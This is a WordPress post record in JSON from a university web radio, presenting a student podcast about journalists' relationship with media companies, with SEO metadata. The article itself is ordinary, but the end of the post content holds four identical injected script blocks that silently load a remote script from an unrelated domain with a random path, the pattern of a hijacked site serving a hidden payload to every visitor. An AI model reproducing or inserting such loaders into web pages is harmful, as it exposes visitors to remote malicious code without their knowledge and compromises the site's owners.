{"id":12944,"date":"2023-05-23T09:00:00","date_gmt":"2023-05-23T12:00:00","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12944"},"modified":"2025-10-21T13:01:00","modified_gmt":"2025-10-21T16:01:00","slug":"jornalistas-e-as-empresas-de-jornalismo","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/","title":{"rendered":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;A rela\u00e7\u00e3o entre jornalistas e as empresas de Jornalismo&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/ESPACO-EXPERIMENTAL-PODCAST-A-RELACAO-ENTRE-OS-JORNALISTAS-E-AS-EMPRESAS-DE-JORNALISMO-2023.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d, realizada durante a atividade curricular dos alunos e alunas da Faculdade de Comunica\u00e7\u00e3o da UFPA, para a disciplina Teoria do Jornalismo, ministrada pelo professor Leandro Lage.<\/p>\n\n\n\n<p>Neste epis\u00f3dio, as estudantes Evelyn Ludovina e Beatriz Eleres, que apresentam o podcast, conversam com a jornalista e professora Ivana Oliveira, sobre o espa\u00e7o de trabalho dos jornalistas e as rela\u00e7\u00f5es com as empresas onde atuam. Quest\u00f5es envolvendo a teoria organizacional dos grandes ve\u00edculos de comunica\u00e7\u00e3o, incluindo dilemas, liberdades, regras e limita\u00e7\u00f5es t\u00e9cnicas est\u00e3o em pauta no programa. &nbsp;<\/p>\n\n\n\n<p>Outro assunto em debate \u00e9 a pol\u00edtica editorial dos jornais e as dificuldades para a atua\u00e7\u00e3o plena dos jornalistas. De acordo com a professora Ivana Oliveira, diferente do trabalho que \u00e9 constru\u00eddo nas m\u00eddias digitais e populares, na l\u00f3gica dos grandes ve\u00edculos de comunica\u00e7\u00e3o, a limita\u00e7\u00e3o \u00e9 um elemento muito presente por causa do campo pol\u00edtico e financeiro em que as empresas est\u00e3o inseridas.<\/p>\n\n\n\n<p>\u201cO nosso mercado aqui na Amaz\u00f4nia tem uma infinidade de possibilidades, principalmente, para falar sobre a regi\u00e3o. S\u00f3 que as pr\u00f3prias empresas n\u00e3o abordam isso. Ent\u00e3o, eu penso que n\u00f3s jornalistas acabamos dentro dessa m\u00e1quina que m\u00f3i o nosso cotidiano, mas estamos subjulgados a essa linha editorial\u201d, lamenta a professora. &nbsp;<\/p>\n\n\n\n<p>Nesse contexto, a influ\u00eancia das redes sociais digitais na produ\u00e7\u00e3o de conte\u00fado tamb\u00e9m ganha destaque no podcast. Ivana Oliveira refor\u00e7a a import\u00e2ncia de valorizar e investigar esse campo e as oportunidades apresentadas para a discuss\u00e3o efetiva de cidadania, diferen\u00e7as e problemas sociais. \u201cEssa terra f\u00e9rtil pode trazer jornalistas que v\u00e3o dar como respostas a essa sociedade uma pluralidade de vers\u00f5es. Eu penso que a forma\u00e7\u00e3o de voc\u00eas e o investimento em universidades p\u00fablicas trazem essa esperan\u00e7a de um futuro com uma m\u00e3o de obra de uma qualidade muito maior\u201d. &nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>O podcast A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 uma produ\u00e7\u00e3o dos estudantes da turma de jornalismo 2022: Beatriz Eleres, Evelyn Ludovina, Felipe Vilhena, Thiago Lobato, Ayla Ferreira, Samilly Santos e Raul Martins. Para conhecer um pouco mais sobre a realidade vivenciada por muitos profissionais nas grandes empresas de Jornalismo, n\u00e3o perca o segundo epis\u00f3dio da s\u00e9rie Jornalismo em Pauta.<\/p>\n\n\n\n<p>Reportagem: Denily Carvalho<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\" aria-label=\"Read more about A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13220,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-12944","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-23T12:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:01:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"450\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo\",\"datePublished\":\"2023-05-23T12:00:00+00:00\",\"dateModified\":\"2025-10-21T16:01:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\"},\"wordCount\":465,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\",\"name\":\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1\",\"datePublished\":\"2023-05-23T12:00:00+00:00\",\"dateModified\":\"2025-10-21T16:01:00+00:00\",\"description\":\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1\",\"width\":450,\"height\":300,\"caption\":\"A rela\u00e7\u00e3o dos jornalistas e as empresas de Jornalismo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA","description":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/","og_locale":"pt_BR","og_type":"article","og_title":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA","og_description":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-05-23T12:00:00+00:00","article_modified_time":"2025-10-21T16:01:00+00:00","og_image":[{"width":450,"height":300,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo","datePublished":"2023-05-23T12:00:00+00:00","dateModified":"2025-10-21T16:01:00+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/"},"wordCount":465,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/","name":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","datePublished":"2023-05-23T12:00:00+00:00","dateModified":"2025-10-21T16:01:00+00:00","description":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","width":450,"height":300,"caption":"A rela\u00e7\u00e3o dos jornalistas e as empresas de Jornalismo"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"A rela\u00e7\u00e3o entre os jornalistas e as empresas de Jornalismo"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/1547846653-jornalismo-rep.jpg?fit=450%2C300&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3mM","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12944"}],"version-history":[{"count":15,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12944\/revisions"}],"predecessor-version":[{"id":17800,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12944\/revisions\/17800"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13220"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}